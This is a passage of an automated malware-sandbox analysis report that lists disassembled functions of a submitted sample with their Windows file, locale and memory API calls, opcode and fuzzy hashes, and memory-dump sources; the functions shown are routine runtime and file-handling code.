                                                                                              • Opcode ID: b1230ac3a6e6d66f84352e1b09f83445dbd91573c76c168f816b9afe83101c32
                                                                                              • Instruction ID: 17856733bb4497c6e9b74f631a8260afa229185f3310b6522640d74b77cf5bd2
                                                                                              • Opcode Fuzzy Hash: b1230ac3a6e6d66f84352e1b09f83445dbd91573c76c168f816b9afe83101c32
                                                                                              • Instruction Fuzzy Hash: B301FC3A6253239BC721CBA8AC44A577B98BF95766B250624F91ED3190D720DC06CEF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00A2E79B,00000001,?,?,?,00000000,00A366C2,?,?,?), ref: 00A2B22E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00A366C2,?,?,?,?,?,00A36184,?), ref: 00A2B275
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00A2E79B,00000001,?,?), ref: 00A2B2A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: 78419e65cd1da5581685576378cea158129594c3eb9a9613cb61863dc8a56b4c
                                                                                              • Instruction ID: 4e42d71b2c5773aee7b478d602ae56ea31cdbeb85cc107b2b001eac43fb92433
                                                                                              • Opcode Fuzzy Hash: 78419e65cd1da5581685576378cea158129594c3eb9a9613cb61863dc8a56b4c
                                                                                              • Instruction Fuzzy Hash: C331DF31218325EFDB04CF18E808BAE77A5FB84715F04452CF9816B2D0CB74A989CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2D68B: _wcslen.LIBCMT ref: 00A2D691
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B569
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B59C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B5B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: 2cebba890f8a6e8603f70f356dd030e308ccaae740da4b8ee676d6f0cc0fdeda
                                                                                              • Instruction ID: d77af5c6f833e32a4441d4c9d83c97bd963e31da1932869493bd1fad2913c76e
                                                                                              • Opcode Fuzzy Hash: 2cebba890f8a6e8603f70f356dd030e308ccaae740da4b8ee676d6f0cc0fdeda
                                                                                              • Instruction Fuzzy Hash: 1D01B531224230ABEF21AB787D45BEE3358AF09785F144434FA03EA095DB54DA8286B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4CA53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A4CA78
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: f7636b2e3e5088fa180c7963ed88bfd190a117cda7e4714032c3e1a145b74dd4
                                                                                              • Instruction ID: 399d7817a1cd9251cf1933c910b68a3e3da4d52c13f5a06d40d7ca7e30f6a158
                                                                                              • Opcode Fuzzy Hash: f7636b2e3e5088fa180c7963ed88bfd190a117cda7e4714032c3e1a145b74dd4
                                                                                              • Instruction Fuzzy Hash: 3441287550524C9EDF22CF64CC85BF6BBBAEB85314F1408EDE58E87142D235AE469F20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4C12C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 00A4C19D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 8e68b3820482ef1e20a3370e0c2bc5964d3262a59ea2a8b625ec0cc3a58127eb
                                                                                              • Instruction ID: b451231c524de2ae9054f40365f9c4080a148361026717242cf9e8b0048c41e4
                                                                                              • Opcode Fuzzy Hash: 8e68b3820482ef1e20a3370e0c2bc5964d3262a59ea2a8b625ec0cc3a58127eb
                                                                                              • Instruction Fuzzy Hash: 73012576501208BBCF029FA4DC02DEE7FA2FF4C761F014515FE0826161CB769972AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4C0CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A4B72F), ref: 00A4C115
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 472af13a1a201dd752cce952f3100abeece8790e3a7373a0c9f974d000c70a39
                                                                                              • Instruction ID: d7a12d3590d4dc27593d9813ca915e4bf8398336c9ae4abd8138b91fba7ea9dd
                                                                                              • Opcode Fuzzy Hash: 472af13a1a201dd752cce952f3100abeece8790e3a7373a0c9f974d000c70a39
                                                                                              • Instruction Fuzzy Hash: 59F0BE35A41218BBCF01DF94DC02CAE7FA1FB987A2B014515FE092A260CF719952AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4BF6F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 8a1852e66facb93307b7cb206dd60f55e656b2e69edae2027e3968769056ebdb
                                                                                              • Instruction ID: 0221e6e7cf5c68d32fdff99cc0979ea10699af3c269d0057329429d382958e0a
                                                                                              • Opcode Fuzzy Hash: 8a1852e66facb93307b7cb206dd60f55e656b2e69edae2027e3968769056ebdb
                                                                                              • Instruction Fuzzy Hash: BDE05C30641218BB86009B948C02D7E7F60FB88712F410115FC0463240CF709D4696D9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3FD58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3FD6A
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3To
                                                                                              • API String ID: 1269201914-245939750
                                                                                              • Opcode ID: 845965362c895a4a8190f7e742a034903ad082f833be8618533e8e7b5f2c93e6
                                                                                              • Instruction ID: 04404d54e4a6a4816c316ecdf8d6ea4e759db4dc0c0e9e3e1eed890477b310d2
                                                                                              • Opcode Fuzzy Hash: 845965362c895a4a8190f7e742a034903ad082f833be8618533e8e7b5f2c93e6
                                                                                              • Instruction Fuzzy Hash: 1BB012A1A78500BD372421203D07F36012CE4C0B16F70893AF841C004094440C481171
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4CDB0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A4C97B: GetOEMCP.KERNEL32(00000000,?,?,00A4CC04,?), ref: 00A4C9A6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A4CC49,?,00000000), ref: 00A4CE24
                                                                                              • GetCPInfo.KERNEL32(00000000,00A4CC49,?,?,?,00A4CC49,?,00000000), ref: 00A4CE37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: c1898747250e050a71faa3098c26b4aca8c28ae6abeb77f19c4ff834d9391d30
                                                                                              • Instruction ID: f8da2cf4ed98cafba4456fe3aeab27882dd374fbb9025e63a8296c7705a123f3
                                                                                              • Opcode Fuzzy Hash: c1898747250e050a71faa3098c26b4aca8c28ae6abeb77f19c4ff834d9391d30
                                                                                              • Instruction Fuzzy Hash: DE5124799023059EDB64CF75C8826BBBBF6EFC1320F14446ED09E87252D7399946CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,00A2ACB0,?,?,00000000,?,?,00A29C8B,?), ref: 00A2AE3A
                                                                                              • GetLastError.KERNEL32(?,?,00A29C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00A2AE49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 87e0540a744da109883145001f690559ff2644ef6e58777263cf899868108daa
                                                                                              • Instruction ID: 9897fb301fa44dc211d98048d7134f54618b8373eafb4693dc7f457f8f1b9458
                                                                                              • Opcode Fuzzy Hash: 87e0540a744da109883145001f690559ff2644ef6e58777263cf899868108daa
                                                                                              • Instruction Fuzzy Hash: C04125352047758BDB24AF6CF9847AA73A4FB78312F100539E84683A51D774DC86CB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4CBE7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A4A515: GetLastError.KERNEL32(?,00A63070,00A45982,00A63070,?,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A519
                                                                                                • Part of subcall function 00A4A515: _free.LIBCMT ref: 00A4A54C
                                                                                                • Part of subcall function 00A4A515: SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A58D
                                                                                                • Part of subcall function 00A4A515: _abort.LIBCMT ref: 00A4A593
                                                                                                • Part of subcall function 00A4CD0E: _abort.LIBCMT ref: 00A4CD40
                                                                                                • Part of subcall function 00A4CD0E: _free.LIBCMT ref: 00A4CD74
                                                                                                • Part of subcall function 00A4C97B: GetOEMCP.KERNEL32(00000000,?,?,00A4CC04,?), ref: 00A4C9A6
                                                                                              • _free.LIBCMT ref: 00A4CC5F
                                                                                              • _free.LIBCMT ref: 00A4CC95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 9684e87d5d6751081bc2c1672a5445d055efd8e138d39492d5b48454d7003e9e
                                                                                              • Instruction ID: 0e846b36013385ffefa9e810d9c7fb09c9f3fd304c1125526b158e6fdf688a18
                                                                                              • Opcode Fuzzy Hash: 9684e87d5d6751081bc2c1672a5445d055efd8e138d39492d5b48454d7003e9e
                                                                                              • Instruction Fuzzy Hash: 8031D439901204EFDB50EFA9D580BADBBF5EF80331F250099E40C9B2A1EB769D41DB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A27ED0,?,?,?,00000000), ref: 00A2B04C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2B100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: bae41592b8b7ef339a7d9443590c39dc74d1c8215734af9dcafbddbedb153a56
                                                                                              • Instruction ID: 38d93141ed47bb9778b78cd73093095cead1c8a5d4b85bde4249eeeb03077b3b
                                                                                              • Opcode Fuzzy Hash: bae41592b8b7ef339a7d9443590c39dc74d1c8215734af9dcafbddbedb153a56
                                                                                              • Instruction Fuzzy Hash: D721F03126C3519FC716CF69D891AABBBE4AF55304F04492CB4E183191D329E90C9B72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A2B1B7,?,?,00A281FD), ref: 00A2A946
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A2B1B7,?,?,00A281FD), ref: 00A2A976
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: fc46117259418a7b0f30c8c2f2da59c07ee4a4d6391dfae7b89ca8cc29ef70c0
                                                                                              • Instruction ID: ebfaba379615d7f771ebfafe92d92d77d74ce39f3cdb7086aaac05c1cdfea4de
                                                                                              • Opcode Fuzzy Hash: fc46117259418a7b0f30c8c2f2da59c07ee4a4d6391dfae7b89ca8cc29ef70c0
                                                                                              • Instruction Fuzzy Hash: 7A2100B14043546FE3308B6ADC88BB776ECEB59321F510A29FAD6C21C1C778A885C672
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A21F30 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A21F35
                                                                                                • Part of subcall function 00A242F1: __EH_prolog.LIBCMT ref: 00A242F6
                                                                                              • _wcslen.LIBCMT ref: 00A21FDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: e4ed8d644982c5a1281a7aab84526583fa5ad3139e23b7cbd1c50c58f2d91d17
                                                                                              • Instruction ID: 47f3902b98ce857a46a36363f6b98743a0396cfcde6414adbbb01200fb01a020
                                                                                              • Opcode Fuzzy Hash: e4ed8d644982c5a1281a7aab84526583fa5ad3139e23b7cbd1c50c58f2d91d17
                                                                                              • Instruction Fuzzy Hash: 2C218B32904228AFCF15AF98D991AEEFBB6BF18700F10043EF455A36A2CB755951CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A44D02 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx,00000000,?,00A44CAD,00A840C4,00000FA0), ref: 00A44D85
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A44D8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
